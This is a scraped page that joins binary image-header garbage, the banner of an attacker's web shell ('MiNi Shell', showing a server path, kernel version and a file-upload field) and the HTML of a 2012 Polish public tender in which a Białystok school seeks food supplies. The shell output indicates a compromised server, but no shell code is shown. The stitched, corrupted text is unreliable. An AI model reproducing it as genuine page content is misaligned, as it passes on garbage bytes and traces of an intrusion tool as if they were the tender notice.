JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120731/277964-N-2012.html

<p class="kh_header"><b>Białystok: Dostawa artykułów żywieniowych w roku szkolnym 2012/2013 dla potrzeb Zespołu Szkół Integracyjnych Nr 1 im. Jana Pawła II w Białymstoku.</b><br>
<b>Numer ogłoszenia: 277964 - 2012; data zamieszczenia: 31.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Integracyjnych Nr 1 im. Jana Pawła II , ul. Łagodna 10, 15-757 Białystok, woj. podlaskie, tel. 085 6644680, faks 085 6540049.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsi1.internetdsl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zespół szkół i placówek oświatowych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywieniowych w roku szkolnym 2012/2013 dla potrzeb Zespołu Szkół Integracyjnych Nr 1 im. Jana Pawła II w Białymstoku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiot zamówienia w zakresie zadania nr 1 dotyczy pieczywa 
i wyrobów cukierniczych:
1.Bułka tarta 500g-300 kg
2.Bułka słodka z budyniem 60g-2 000 szt.
3.Bułka słodka z marmoladą 60g-2 000szt.
4.Bułka słodka z serem 60g	2 000szt.
5.Bułka zwykła 50g-3 000 szt.
6.Chleb biały 600g-3 000 szt.
7.Chleb razowy 500g-2 000 szt.
8.Pączek-2 000 szt.



2)	Przedmiot zamówienia w zakresie zadania nr 2 dotyczy mięsa i wyrobów mięsnych:
1.Boczek pieczony b/k-80 kg
2.Boczek świeży b/ż-400 kg
3.Boczek wędzony-200 kg
4.Filet z indyka-1500 kg
5.Filet z kurczaka-1000 kg
6.Gulasz wieprzowy surowy-1500 kg
7.Karkowina b/k-1000 kg
8.Kiełbasa biała parzona drobiowa	400 kg
9.Kiełbasa biała wieprzowa surowa	200 kg
10.Kiełbasa biała wieprzowa parzona	200 kg
11.Kiełbasa podwawelska	800 kg
12.Kiełbasa swojska, nie krótsza niż 15 cm	1000 kg
13.Kiełbasa toruńska	600 kg
14.Kiełbasa złota	400 kg
15.Kości karkowe	700 kg
16.Kurczak świeży	800 kg
17.Krzyżówka wieprzowa obrobiona	500 kg
18.Łopatka wieprzowa b/k	2500 kg
19.Łopatka wieprzowa z/k	500 kg
20.Łopatka wołowa b/k	600 kg
21.Mięsień czterogłowy	800 kg
22.Mięso kl II wieprzowe-500 kg
23.Parówki typu śląskie kl I-800 kg
24.Podudzie z kurczaka-600 kg
25.Porcje rosołowe-200 kg
26.Schab wieprzowy b/k-1 900 kg
27.Schab wieprzowy z/k-500 kg
28.Szynka wieprzowa kl. I b/k (bitki)-1 000 kg
29.Szynka wieprzowa kl. II b/k (gulasz)-700 kg
30.Szynka wieprzowa kl. III b/k (kotlet mielony)-500 kg
31.Szynka wieprzowa z/k-300 kg
32.Udziec wołowy b/k-800 kg
33.Udziec z kurczaka świeży-1 900 kg
34.Wątróbka drobiowa-300 kg
35.Wątroba wieprzowa-300 kg
36.Wołowina kl. I b/k-300 kg
37.Wołowina kl. II b/k-300 kg
38.Wołowina kl. III b/k-300 kg
39.Żeberka wp pasy-100 kg
40.Żołądki drobiowe-300 kg



3)	Przedmiot zamówienia w zakresie zadania nr 3 dotyczy mrożonek:
1.Fasolka szparagowa 450g-300 szt.
2.Filet z mintaja -200 kg
3.Filet z miruna -800 kg
4.Filet z morszczuka -700 kg
5.Filet zapiekany z serem -200kg.
6.Frytka 2,5 kg-500 szt.
7.Kalafior 450g-400 szt.
8.Kartacze-400 kg
9.Knedle owocowe, mrożone (opak. 0,45 - 3 kg)-400 kg
10.Kompot wieloowocowy 450g-800 szt.
11.Kostka rybna panierowana -400 kg.
12.Kotlet cordon blue 1 kg-600 kg.
13.Lody kubek, różne smaki-2 500 szt.
14.Leczo 450g-500 szt	
15.Mieszanka kompotowa 450g-800 szt.
16.Mieszanka warzywna 7-składnikowa 450g-900 szt.
17.Paluszki rybne z fileta-600 kg
18.Pierogi ruskie (opak. 0,5 - 2,5 kg)-400 kg
19.Pierogi z kapustą i grzybami, mrożone-300 kg
20.Pierogi z truskawkami, mrożone-300 kg
21.Placki ziemniaczane-900 kg
22.Pyzy z mięsem-200 kg
23.Pyzy ziemniaczane-150 kg
24.Śledź matias solony-300 kg
25.Śledź matias marynowany-300 kg
26.Truskawka 450g-1 200 szt.
27.Wiśnia b/p 450g-600 szt.



4)	Przedmiot zamówienia w zakresie zadania nr 4 dotyczy artykułów spożywczych:

1.Baton typu Kinder bueno lub równoważny nie mniejszy niż 43g 
	2 000 szt.
2.Baton typu Lion lub równoważny nie mniejszy niż 43g-1 000 szt.
3.Baton typu Snickers lub równoważny nie mniejszy niż 51g-2 000 szt.
4.Baton typu nestle Cini minis lub równoważny nie mniejszy niż 25g-2 000 szt.
5.Bomboniera Toffifee lub równoważny nie mniejszy niż 125 g-800 szt.
6.Brzoskwinie w syropie nie mniejsze niż 850 ml-800 szt.
7.Chrzan nie mniejszy niż 290g-400 szt.
8.Ciastka typu Pieguski lub równoważne nie mniejsze niż 135 g-1 500 szt.
9.Cukier nie mniejszy niż 1 kg-2 000 kg
10.Cukier puder nie mniejszy niż 400g-100 szt.
11.Cukier waniliowy nie mniejszy niż 32g-300 szt
12.Cynamon mielony nie mniejszy niż 15 g-150 szt.	
13.Czekolada typu goplana lub równoważna nie mniejsza niż 100 g	-2 000 szt.
14.Czekolada typu Wedel lub równoważna nie mniejsza niż 100g-2 000 szt.
15.Czekolada typu Baron lub równoważna nie mniejsza niż 100g-2 000 szt
16.Czosnek granulowany nie mniejszy niż 16g-880 szt.
17.Delikat do drobiu typu Knorr lub równoważny nie mniejszy niż 600g-50 szt	
18.Delikat do mięs typu Knorr lub równoważny nie mniejszy niż 700g-50 szt	
19.Groszek konserwowy nie mniejszy niż 400g typu Vernet lub równoważny-350 szt
20.Herbata typu Lipton  lub równoważna saszetki 100x2g -200 szt.
21.Herbata granulowana typu Lipton lub równoważna nie mniejsza niż 100 g-200 szt.
22.Herbata liściasta typu Lipton lub równoważne nie mniejsza niż 100 g-200 szt.
23.Herbatniki typu Jeżyki lub równoważne nie mniejsze niż 140 g-3 000 szt.	
24.Jajka typu Kinder lub równoważne nie mniejsze niż 20 g-2 500 szt.	
25.Kasz gryczana nie mniejsza niż 500 g-500 szt.
26.Kasza jęczmienna gruboziarnista, średnia nie mniejsza niż 500g-2 000 szt.
27.Kasza jęczmienna pęczak nie mniejsza niż 500g-500 szt.
28.Kasza manna nie mniejsza niż 500g-160 szt.
29.Ketchup ł/p nie mniejszy niż 500g typu Pudliszki lub równoważny-540 szt.
30.Koncentrat buraczany nie mniejszy niż 300 ml typu Krakus lub równoważny-20 l
31.Koncentrat pomidorowy nie mniejszy niż 1 kg typu Dawtona lub równoważny-120 kg
32.Kukurydza konserwowa nie mniejsza niż 425g typu Vernet lub równoważny-400 szt.
33.Kwasek cytrynowy nie mniejszy niż 20g-800 szt.
34.Liść laurowy nie mniejszy niż 10g	-500 szt.
35.Liść laurowy nie mniejszy niż 12g-	200 szt.
36.Liść laurowy nie mniejszy niż 5g	-200 szt
37.Majeranek nie mniejszy niż 10g-80 szt.
38.Majeranek nie mniejszy niż 20g-300 szt.
39.Majonez nie mniejszy niż 320 ml typu Winiary lub równoważny-500 szt
40.Majonez nie mniejszy niż 2,85 kg typu Winiary lub równoważny-200 szt.
41.Majonez nie mniejszy niż 400 ml  typu Winiary lub równoważny-200 szt
42.Makaron kolanka nie mniejszy niż 1 kg typu Barilla lub równoważny-2 000 kg
43.Makaron spaghetti nie mniejszy niż 1 kg typu Lubella lub równoważny-800 kg
44.Makaron świder nie mniejszy niż 1 kg typu Barilla lub równoważny-2 000 kg
45.Mąka luksusowa nie mniejsza niż 1 kg-800 kg
46.Mąka tortowa nie mniejsza niż 1 kg-600 kg
47.Mąka ziemniaczana nie mniejsza niż 1 kg-200 kg
48.Miód pasieka wielokwiatowy nie mniejszy niż 400g-70 kg
49.Musztarda chrzanowa nie mniejsza niż 190g typu Agrovita lub równoważna-400 szt.
50.Napój herbaciany nie mniejszy niż 300g-100 szt.
51.Napój herbaciany cytrynowy nie mniejszy niż 300g-100 szt.
52.Napój nie mniejszy niż 400 ml typu Kubuś play lub równoważny-2 000 szt.
53.Ogórek konserwowy  nie mniejszy niż 900 ml-800 szt.
54.Olej nie mniejszy niż 1l typu kujawski  lub równoważny-25 000 szt.
55.Ocet spirytusowy 10%  nie mniejszy niż 500 ml-50 szt
56.Pieprz naturalny mielony nie mniejszy niż 20g typu Prymat lub równoważny-580 szt
57.Pieprz ziołowy mielony nie mniejszy niż 20g typu Prymat lub równoważny-500 szt.
58.Pieprz ziołowy mielony nie mniejszy niż 15g typu Prymat lub równoważny-400 szt
59.Płatki owsiane nie mniejszy niż 500g-80 szt.
60.Przecier ogórkowy  nie mniejszy niż 300g-600 szt.
61.Przyprawa do mięs i grilla nie mniejsza niż 1,1 kg typu maggi lub równoważna-	30 szt.
62.Przyprawa do mięsa mielonego nie mniejsza niż 20g	-200 szt.
63.Przyprawa do mięsa mielonego nie mniejsza niż 30g-	80 szt.
64.Przyprawa do ryb typu Prymat lub równoważna nie mniejsza niż 20 g-80 szt.
65.Przyprawa typu jarzynka lub równoważna nie mniejsza niż 2,8 kg-120 szt.
66.Przyprawa prowansalska nie mniejsza niż 10g	-300 szt.
67.Przyprawa sypka nie mniejsza niż 1 kg typu Vegetta lub równoważna	-1 000 szt.	
68.Przyprawa w płynie typu Winiary lub równoważna nie mniejsza niż 200 g-300 szt.
69.Przyprawa w płynie typu Winiary lub równoważna nie mniejsza niż 960ml-40 szt.
70.Pulpa pomidorowa nie mniejsza niż 3 kg-30 szt.	
71.Rodzynki nie mniejsze niż 150 g-100 szt.	
72.Rogalik typu chipita 7 days lub równoważny nie mniejszy niż 65 g-4 000 szt.	
73.Rosół drobiowy typu Winiary lub równoważny nie mniejszy niż 2,2 kg-90 kg	
74.Ryż biały typu Sonko lub równoważny nie mniejszy niż 1 kg-500 kg
75.Sekret szefa drobiowy typu Maggi lub równoważny nie mniejszy niż 800g-20 kg
76.Sekret szefa grzybowy typu Maggi lub równoważny nie mniejszy niż 650g-15 kg
77.Sekret szefa typu Maggi lub równoważny wołowy nie mniejszy niż 900g-25 kg
78.Sos boloński typu Winiary lub równoważny nie mniejszy niż 1 kg-30 kg
79.Sos boloński typu Winary lub równoważny nie mniejszy niż 1,1 kg-30 kg
80.Sos demi glace typu Winiary lub równoważny nie mniejszy niż 900 g-30 kg
81.Sos grzyby leśne typu Winiary lub równoważny nie mniejszy niż 900g-30 kg
82.Sos myśliwski typu Winiary lub równoważny nie mniejszy niż 900g-30 kg
83.Sos pieczeniowy typu Winiary lub równoważny nie mniejszy niż 1,1 kg-35 kg
84.Sos sałatkowy typu Winiary lub równoważny nie mniejszy niż 900g-30 kg
85.Sos spaghetti typu Łowicz lub równoważny nie mniejszy niż 350 ml-140 l
86.Sos spaghetti typu Łowicz lub równoważny nie mniejszy niż 520 ml-120 l
87.Sól jodowana typu Cenos lub równoważna nie mniejsza niż 1 kg-700 kg
88.Syrop mix typu Herbapol lub równoważny nie mniejszy niż 420 ml-1 000 szt.
89.Syrop mix typu Paola lub równoważny nie mniejszy niż 430 ml-1 000 szt
90.Szczaw konserwowy typu Hana lub równoważny nie mniejszy niż 300g-400 szt.
91.Szczaw konserwowy typu Hana lub równoważny nie mniejszy niż 900g-100 szt
92.Zaprawa cytrynowa nie mniejsza niż  300 ml-100 szt.
93.Ziele angielskie nie mniejsze niż 15 g-900 szt.
94.Zupa barszcz biały typu Winiary lub równoważna nie mniejsza niż 900 g-40 szt.
95.Zupa borowikowa typu Winiary lub równoważna nie mniejsza niż 900 g-40 szt.
96.Zupa barszcz biały typu Winiary lub równoważna nie mniejsza niż 900 g-30 szt.
97.Zupa cebulowa typu Winiary lub równoważna nie mniejsza niż 900g-30 szt
98.Zupa ogonowa typu Winiary lub równoważna nie mniejsza niż 900g-80 szt.
99.Zupa żurek typu Winiary lub równoważna nie mniejsza niż 900 g-30 szt.
100.Zestaw świąteczny 145g-1 000 szt.	



5)	Przedmiot zamówienia w zakresie zadania nr 5 dotyczy nabiału:
1.Drożdże świeże nie mniejsze niż 100 g-200 szt.	
2.Jogurt polski pitny różne smaki, nie mniejszy niż  400g-2 000 szt.
3.Jogurt polski pitny różne smaki, nie mniejszy niż  250g-2 000 szt
4.Masło śmietankowe nie mniejsze niż 200g-900 szt.
5.Masło polskie nie mniejsze niż 200g-900 szt
6.Masło typu łaciate nie mniejsze niż 200g-900 szt
7.Mleko 3/2% nie mniejsze niż 1 l-1 000 szt.
8.Mleko typu twój kubek 2% nie mniejsze niż 1l-100l
9.Ser żółty typu Gouda lub równoważny-250 kg
10.Śmietana nie mniejsza niż 0,2l-500 szt.
11.Śmietana gęsta 18% nie mniejsza niż 400ml-4 400 szt
12.Śmietanka UHT 18% nie mniejsza niż 375ml-200 szt.	
13.Twaróg mielony w wiadrze nie mniejszy niż 1 kg-500 kg	
14.Twaróg półtłusty krajanka-500 kg




6)	Przedmiot zamówienia w zakresie zadania nr 6 dotyczy warzyw i owoców:
1.Banan-3 000 kg
2.Brzoskwinia-1 000 kg
3.Burak-2 000 kg
4.Cebula-1 900 kg
5.Cytryna-200 kg
6.Czereśnia-500 kg
7.Czosnek świeży-5 kg
8.Fasola-500 kg
9.Groch połówki-400 kg
10.Gruszka-1 000 kg
11.Jabłko-1 900 kg
12.Jaja-1 300 kg
13.Kalafior-200 kg
14.Kapusta biała-1 500 kg
15.Kapusta biała młoda-500 kg
16.Kapusta czerwona-800 kg
17.Kapusta kiszona-1 400 kg
18.Kapusta pekińska-500 kg
19.Kapusta włoska-800 kg
20.Kiwi-800 kg
21.Koper-900 pęczków
22.Mandarynka-800 kg
23.Marchew-5 500 kg
24.Nektarynka-400 kg
25.Ogórek kiszony-1 200 kg
26.Ogórek małosolny-400 kg
27.Ogórek świeży	-1 600 kg
28.Papryka-800 kg
29.Pieczarka-900 kg
30.Pietruszka-1 500 kg
31.Pietruszka natka-900 pęczków
32.Pomarańcza-3 000 kg
33.Pomidor-1 200 kg
34.Por-700 kg
35.Rzodkiew-800 kg
36.Rabarbar świeży-300 kg
37.Rzodkiewka-800 pęczków	
38.Sałata-400 kg
39.Seler-1 900 kg
40.Szczypior-300 pęczków
41.Śliwka-500 kg
42.Truskawka-300 kg
43.Winogrono jasne-400 kg
44.Winogrono ciemne-400 kg
45.Wiśnia-500 kg
46.Ziemniak-44 000 kg
47.Ziemniaki młode-4 000 kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W razie pojawienia się nieprzewidzianych trudności podczas wykonywania umowy w ramach zamówienia publicznego, Zamawiający dopuszcza zamówienie uzupełniające, jednak nie więcej niż 50% zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9, 15.10.00.00-9, 15.89.60.00-5, 15.80.00.00-6, 15.50.00.00-3, 15.30.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz dostaw w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie dwóch lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonywania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsi1.internetdsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Integracyjnych Nr 1 im. Jana Pawła II w Białymstoku
ul. Łagodna 10 
15-757 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2012 godzina 10:00, miejsce: Zespół Szkół Integracyjnych Nr 1 im. Jana Pawła II w Białymstoku
ul. Łagodna 10
15 - 757 Białystok
Pokój nr 11  (sekretariat szkoły).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 16.09.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
